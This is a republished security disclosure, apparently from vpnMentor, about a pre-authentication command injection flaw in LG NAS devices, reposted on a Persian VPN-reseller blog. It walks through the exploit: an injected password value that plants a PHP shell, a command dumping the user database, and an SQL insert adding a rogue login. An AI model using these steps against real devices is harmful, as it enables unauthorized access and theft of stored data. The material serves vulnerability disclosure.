• Skip to content
  • Skip to primary sidebar

خرید VPNvip خرید VPN خرید کریو خرید kerio فیلتر شکن خرید فیلترشکن vip vpn

خرید VPN خرید کریو خرید وی پی ان خرید vipVPN خرید kerio فیلترشکن Vip vpn

Header Left

vip vpn
vipvpn

Critical Vulnerability Found in Majority of LG NAS Devices

آوریل 22, 2018 by کانکشن هوشمند

Here at vpnMentor, we are concerned about your security and privacy. Our special team of hackers & researchers roam the internet to find security issues in sensitive products. We found this remote command execution vulnerability in the majority of LG NAS devices. Read more to find out how we exploited this vulnerability and what you can do about it. Share

Overview:

We conducted a comprehensive assessment on an LG NAS device. This device is a storage device connected to a network that only allows authorized users. It’s like a private cloud, only it costs less, is simple to operate, and it gives you complete control. However, we found a way to hack into the system using a pre-authenticated remote command injection vulnerability, which can then allow us to do virtually everything including access the data and tamper with the user data and content. 

Exploitation:

The vulnerability is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.

As we show in the video, you cannot simply log in with any random username and password. However, there lies a command injection veulnerability in the “password” parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it. To add a new user, we can simply write a persistent shell called c.php by using:

;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php

Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:

echo “.dump user” | sqlite3 /etc/nas/db/share.db

Dumping means reading all database data. We dump the database so we can see the users’ usernames and passwords. This also lets us add our own.

To add a new user into the database, we need to generate a valid MD5. We can use the included MD5 tool to create a hash with the username “test” and the password “1234.”

sudo nas-common md5 1234

Once we have a valid password and username, we can add it to the database with the following:

INSERT INTO “user” VALUES(‘test’,’md5_hash’,’Vuln Test’,’test@localhost’,’’);

After this is complete, we can log in to the LG Network Storage with the username test and the password 1234.

This gives us access to the system as an authorized user. From here we can access any data or classified files that are stored on the LAS device.

Recommendations:

  • Be aware that LAS devices can be hacked and exploited.
  • Contact LG and let them know about this vulnerability and demand they fix it.
  • Warn your friends on facebook (here’s a link), or twitter (click to tweet)

Filed Under: سایت دیوار Tagged With: Critical, Devices, LG, Majority, nas, vulnerability

Primary Sidebar

نوشته‌های تازه

  • نحوه تماشای آن در سال 2022 (به روز رسانی فوریه 2022)
  • انیمیشن Shenmue Drops اولین نگاه به اولین سریال
  • چگونه Hulu را در ترکیه تماشا کنیم؟
  • چگونه Inventing Anna را به صورت آنلاین از هر کجا تماشا کنیم